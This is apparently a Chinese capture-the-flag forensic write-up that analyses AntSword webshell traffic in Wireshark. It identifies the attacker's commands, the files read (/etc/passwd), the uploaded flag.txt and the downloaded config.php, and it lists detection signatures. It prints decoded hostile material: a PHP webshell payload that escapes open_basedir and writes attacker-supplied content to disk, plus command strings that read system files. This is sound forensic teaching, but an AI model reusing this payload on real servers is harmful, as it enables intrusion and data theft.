流量特征分析-蚁剑流量分析

任务：

木马的连接密码是多少

这是分析蚁剑流量，可能是网站的，wireshark过滤http

追踪流http得到

1就是连接密码

1. flag{1}

复制代码

黑客执行的第一个下令是什么

取末了的执行下令。base64解密得

除了id不是蚁剑自带的下令，其他的都是，所以

1. flag{id}

复制代码

黑客读取了哪个文件的内容，提交文件绝对路径

依次读取不同的流。

读到第二个流的时候。

读取了/etc/passwd

1. flag{/etc/passwd}

复制代码

黑客上传了什么文件到服务器，提交文件名

将6个蚁剑webshell木马的请求内容全部解码，得到：

1. 0、cd "/var/www/html";id;echo e124bc;pwd;echo 43523
2. 1、cd "/var/www/html";ls;echo e124bc;pwd;echo 43523
3. 2、cd "/var/www/html";cat /etc/passwd;echo e124bc;pwd;echo 43523
4. 3、/var/www/html/flag.txt
5. 4、/var/www/html/
6. 5、/var/www/html/config.php

复制代码

此中第1个请求和第4个请求都是打印文件清单，因此可通过对比两个文件清单的差异，来判定黑客增删的文件。

发现多了个flag.txt文件。
黑客上传的文件内容是什么

第三个估计就是上传东西到flag.txt内里，所以进行url解码。url解码之后进行js美化

1. 1 = @ini_set("display_errors", "0");
2. @set_time_limit(0);
3. $opdir = @ini_get("open_basedir");
4. if ($opdir) {
5.     $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
6.     $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
7.     @array_push($oparr, $ocwd, sys_get_temp_dir());
8.     foreach($oparr as $item) {
9.         if (!@is_writable($item)) {
10.             continue;
11.         };
12.         $tmdir = $item.
13.         "/.368479785";
14.         @mkdir($tmdir);
15.         if (!@file_exists($tmdir)) {
16.             continue;
17.         }
18.         $tmdir = realpath($tmdir);
19.         @chdir($tmdir);
20.         @ini_set("open_basedir", "..");
21.         $cntarr = @preg_split("/\\\\|\//", $tmdir);
22.         for ($i = 0; $i < sizeof($cntarr); $i++) {
23.             @chdir("..");
24.         };
25.         @ini_set("open_basedir", "/");
26.         @rmdir($tmdir);
27.         break;
28.     };
29. };;
31. function asenc($out) {
32.     return $out;
33. };
35. function asoutput() {
36.     $output = ob_get_contents();
37.     ob_end_clean();
38.     echo "6960".
39.     "cb205";
40.     echo @asenc($output);
41.     echo "1e0a".
42.     "91914";
43. }
44. ob_start();
45. try {
46.     $f = base64_decode(substr($_POST["t41ffbc5fb0c04"], 2));
47.     $c = $_POST["ld807e7193493d"];
48.     $c = str_replace("\r", "", $c);
49.     $c = str_replace("\n", "", $c);
50.     $buf = "";
51.     for ($i = 0; $i < strlen($c); $i += 2) $buf. = urldecode("%".substr($c, $i, 2));
52.     echo(@fwrite(fopen($f, "a"), $buf) ? "1" : "0");;
53. } catch (Exception $e) {
54.     echo "ERROR://".$e - > getMessage();
55. };
56. asoutput();
57. die(); & ld807e7193493d = 666 C61677B77726974655F666C61677D0A & t41ffbc5fb0c04 = 0 ZL3Zhci93d3cvaHRtbC9mbGFnLnR4dA ==

复制代码

1. ld807e7193493d = 666 C61677B77726974655F666C61677D0A & t41ffbc5fb0c04 = 0 ZL3Zhci93d3cvaHRtbC9mbGFnLnR4dA ==

复制代码

末了那行拿出来解码

得出上传的内容是：

1. flag{write_flag}

复制代码

黑客下载了哪个文件，提交文件绝对路径

第四点的时候我们已经得出黑客下载了config.php文件

1. flag{/var/www/html/config.php}

复制代码

总结-蚁剑显着流量特征

1、利用URL编解码；
2、每个数据包前面都会包含@ini_set(“display_errors”, “0”);@set_time_limit(0);这两个语句；
3、相应包都是明文。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。